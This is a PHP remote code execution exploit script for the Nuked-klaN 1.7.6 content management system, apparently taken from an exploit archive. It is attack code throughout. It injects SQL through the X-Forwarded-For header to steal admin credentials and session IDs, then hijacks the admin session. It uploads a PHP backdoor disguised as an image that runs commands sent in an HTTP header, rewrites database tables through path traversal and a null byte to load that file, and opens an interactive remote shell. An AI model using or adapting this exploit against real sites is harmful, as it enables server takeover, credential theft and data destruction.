nuked176-exec.txt

`<?php  
#  
# Nuked-klaN 1.7.6 Remote Code Execution Exploit  
# ------------------------------------------------  
# Author: DarkFig <[email protected]>  
# Website: http://www.acid-root.new.fr/  
# PHP conditions: None =]  
# Private since 2 months.  
#  
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.  
require("phpsploitclass.php"); # If you want to use this class, the latest  
# version can be downloaded from acid-root.new.fr.  
  
$xpl = new phpsploit();  
$url = 'http://localhost/nk/'; # url  
$prx = ''; # proxy <proxyip>:<proxyport>  
$pra = ''; # basic authentification <proxyuser:proxypwd>  
  
$xpl->agent("Firefox");  
$xpl->allowredirection(0);  
$xpl->cookiejar(0);  
  
if($prx) $xpl->proxy($prx);  
if($pra) $xpl->proxyauth($pra);  
  
$config = array();  
$config[] = 'nuked'; # table prefix  
$config[] = 'nuked'; # cookie prefix  
$config[] = 'ORDER by date LIMIT 1'; # sql conditions  
$config[] = 'HAK'; # match, length <= 3  
$config[] = '<?php'."\n" # php code  
.'error_reporting(0);'  
.'if(isset($_SERVER[HTTP_SHELL]))'  
.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'  
.'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';  
  
$request = array();  
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";  
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'";  
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'";  
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";  
  
for($i=0;$i<count($request);$i++)  
{  
$deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";  
$sql = $deb.$request[$i]."))) #";  
$xpl->addheader("X-Forwarded-For",$sql);  
$xpl->get($url);  
$xpl->reset('header');  
}  
  
if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))  
die("Exploit Failed");  
  
$what = array("login","passwd","user_id","session");  
for($i=0;$i<count($what);$i++)  
print "\n".$what[$i]." -> ".$matches[2][$i];  
  
if(empty($matches[2][3]))  
exit("\nNo session found");  
  
# Logged in as admin  
$name = array("admin_session","user_id","sess_id");  
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);  
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);  
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);  
  
$phpc = array(  
frmdt_url => $url.'?file=User&op=update_pref',  
'fichiernom' => array(frmdt_filename => '1.jpg',  
frmdt_content => $config[4]));  
  
$xpl->addheader('Referer',$url);  
$xpl->formdata($phpc);  
$xpl->get($url.'?file=User&op=edit_pref');  
  
if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");  
else print "\n\$shell> ";  
  
$sql = array();  
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*  
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/  
$sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";  
$sql[] = "DELETE FROM $config[0]_nbconnecte;";  
  
for($i=0;$i<count($sql);$i++)  
$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);  
  
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))  
{  
# 0'); include('./conf.inc.php'); print $global['db_pass']; //  
$xpl->reset('header');  
$xpl->addheader('Shell',"system('$cmd');");  
$xpl->get($url);  
$data = explode('123456789',$xpl->getcontent());  
print $data[1]."\n\$shell> ";  
}  
  
function char($data)  
{  
$char='CHAR(';  
for($i=0;$i<strlen($data);$i++)  
{  
$char .= ord($data[$i]);  
if($i != (strlen($data)-1)) $char .= ',';  
}  
return $char.')';  
}  
?>  
`